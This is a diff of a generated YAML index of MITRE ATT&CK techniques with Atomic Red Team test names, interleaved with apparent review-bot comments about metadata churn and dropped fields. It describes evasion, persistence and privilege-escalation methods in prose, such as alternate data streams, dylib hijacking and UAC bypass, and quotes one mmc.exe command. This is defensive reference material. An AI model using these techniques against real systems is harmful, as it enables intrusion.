Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -25681,8 +25963,8 @@ defense-evasion:
Retrieved March 21, 2018.
url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
- source_name: Microsoft File Streams
- description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa364404
+ description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
- source_name: Oddvar Moe ADS2 Apr 2018
description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -25700,7 +25982,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.004
atomic_tests:
- name: Alternate Data Streams (ADS)
@@ -25945,7 +26226,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests:
- name: Process Injection via mavinject.exe
@@ -25996,7 +26276,7 @@ defense-evasion:
name: powershell
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -26009,6 +26289,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -26045,17 +26326,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
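Review bot: the platform list of Modify Authentication Process drops `Azure AD`, `Google Workspace` and `Office 365` and gains `Office Suite` and `Identity Provider`, with `x_mitre_version` moving 2.4 to 2.5. This follows the upstream ATT&CK platform consolidation, but any per-platform index, filter or test mapping in this repository that still matches on the three old platform strings will silently stop matching this technique; the regenerated per-platform indexes are worth a look for sections that came out empty or were renamed.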
@@ -26101,9 +26382,6 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1216:
technique:
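Review bot: deleting `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` at the bottom of T1556 here, after re-inserting the same two keys with the same values near the top of the object in the hunks above, changes nothing and is pure key-order churn from the regenerator. The same shuffle recurs for Services Registry Permissions Weakness (where at least the spec version really moves 2.1.0 to 3.2.0) and for Cron, where the first hunk makes the object look as if it lost its `id`, `created` and `external_references` until they reappear further down. Writing keys in a fixed order (sorted, or the order of the source object) would keep future index diffs down to the substantive changes.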
@@ -26141,7 +26419,7 @@ defense-evasion:
behavior may be abused by adversaries to execute malicious files that could
bypass application control and signature validation on systems.(Citation:
GitHub Ultimate AppLocker Bypass List)'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:43:46.045Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Signed Script Proxy Execution
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -26160,7 +26438,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216
atomic_tests:
- name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
@@ -26229,7 +26506,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -26253,12 +26530,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
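Review bot: after this hunk Network Device Authentication carries no `x_mitre_attack_spec_version` at all: both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are deleted and neither is re-added, whereas neighbouring objects such as Signed Script Proxy Execution keep `x_mitre_attack_spec_version: 2.1.0`. The same total removal happens below for Downgrade System Image, Process Argument Spoofing, COR_PROFILER, Extra Window Memory Injection, and Sudo and Sudo Caching. Please confirm the source objects really lack the field rather than the generator dropping the adjacent line together with `spec_version`.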
@@ -26342,7 +26617,6 @@ defense-evasion:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1601.002:
technique:
@@ -26364,7 +26638,7 @@ defense-evasion:
url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
IOS devices. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:49:02.660Z'
name: Downgrade System Image
description: "Adversaries may install an older version of the operating system
of a network device to weaken security. Older operating system versions on
@@ -26398,12 +26672,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -26455,9 +26727,8 @@ defense-evasion:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests:
- name: Create local account with admin privileges
@@ -26604,7 +26875,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1127:
technique:
@@ -26651,7 +26921,7 @@ defense-evasion:
legitimate certificates that allow them to execute on a system and proxy execution
of malicious code through a trusted process that effectively bypasses application
control solutions.'
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:37.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Trusted Developer Utilities Proxy Execution
x_mitre_detection: |-
@@ -26664,12 +26934,13 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_data_sources:
- 'Command: Command Execution'
+ - 'Module: Module Load'
+ - 'Process: Process Metadata'
- 'Process: Process Creation'
x_mitre_defense_bypassed:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127
atomic_tests:
- name: Lolbin Jsc.exe compile javascript to exe
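Review bot: two data sources (`Module: Module Load`, `Process: Process Metadata`) are added to Trusted Developer Utilities Proxy Execution while `x_mitre_attack_spec_version` stays at 2.1.0 and no `x_mitre_version` change appears in the hunk, and the preceding hunk moved the object's `modified` back from 2022-05-24 to 2022-05-05. Content growing while the revision metadata goes backward is what mixing two snapshots of the source data looks like; worth confirming the whole index was built from a single bundle.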
@@ -26830,7 +27101,7 @@ defense-evasion:
mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc
.(Citation:
abusing_com_reg)"
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:41:16.112Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: MMC
x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -26852,7 +27123,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.010:
technique:
@@ -26895,7 +27165,7 @@ defense-evasion:
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-11-29T15:56:50.370Z'
name: Process Argument Spoofing
description: |-
Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -26919,8 +27189,6 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.012:
technique:
@@ -26968,7 +27236,7 @@ defense-evasion:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -27006,8 +27274,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests:
- name: User scope COR_PROFILER
@@ -27186,7 +27452,7 @@ privilege-escalation:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -27238,8 +27504,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests:
- name: Process Injection via Extra Window Memory (EWM) x64 executable
@@ -27278,23 +27542,24 @@ privilege-escalation:
elevation_required: false
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
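Review bot: the rewritten T1053.005 description drops the paragraph on the deprecated `at` utility and on `at.exe` not being able to access tasks created with `schtasks` or the Control Panel, and none of the `+` lines carry it over. If that matches the current upstream ATT&CK text it is expected, but because the same rewrite introduces two new citation keys (`Stack Overflow`, `Red Canary - Atomic Red Team`) and re-wraps the whole block, please confirm the deletion is upstream and not a truncation by the generator.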
@@ -27341,7 +27606,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -27373,8 +27638,8 @@ privilege-escalation:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -27388,6 +27653,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
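Review bot: the new `Red Canary - Atomic Red Team` reference points at this repository's own T1053.005 page on the `master` branch, so the index now cites a moving target that changes whenever that atomic is edited. Nothing to change in this generated file, since the reference is mirrored from upstream ATT&CK, but reviewers should know the circular citation exists and that the retrieval date (June 19, 2024) is the only thing pinning what was actually cited.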
@@ -27400,11 +27669,14 @@ privilege-escalation:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests:
- name: Scheduled Task Startup Script
@@ -27844,7 +28116,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.007:
technique:
@@ -27933,7 +28204,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -28021,7 +28291,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests:
- name: Append malicious start-process cmdlet
@@ -28144,7 +28413,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.006:
technique:
@@ -28176,7 +28444,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -28199,11 +28467,10 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -28261,14 +28528,13 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -28369,7 +28635,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests:
- name: Bypass UAC using Event Viewer (cmd)
@@ -29070,7 +29335,7 @@ privilege-escalation:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -29104,13 +29369,11 @@ privilege-escalation:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -29129,7 +29392,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -29143,7 +29405,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -29170,8 +29431,8 @@ privilege-escalation:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -29202,7 +29463,8 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests:
- name: Service Registry Permissions Weakness
@@ -29266,7 +29528,7 @@ privilege-escalation:
name: command_prompt
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -29338,9 +29600,9 @@ privilege-escalation:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -29356,7 +29618,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests:
- name: Add a driver
@@ -29426,7 +29687,7 @@ privilege-escalation:
elevation_required: true
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -29501,7 +29762,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests:
- name: HKLM - Add atomic_test key to launch executable as part of user setup
@@ -29574,7 +29834,7 @@ privilege-escalation:
elevation_required: true
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -29594,9 +29854,14 @@ privilege-escalation:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
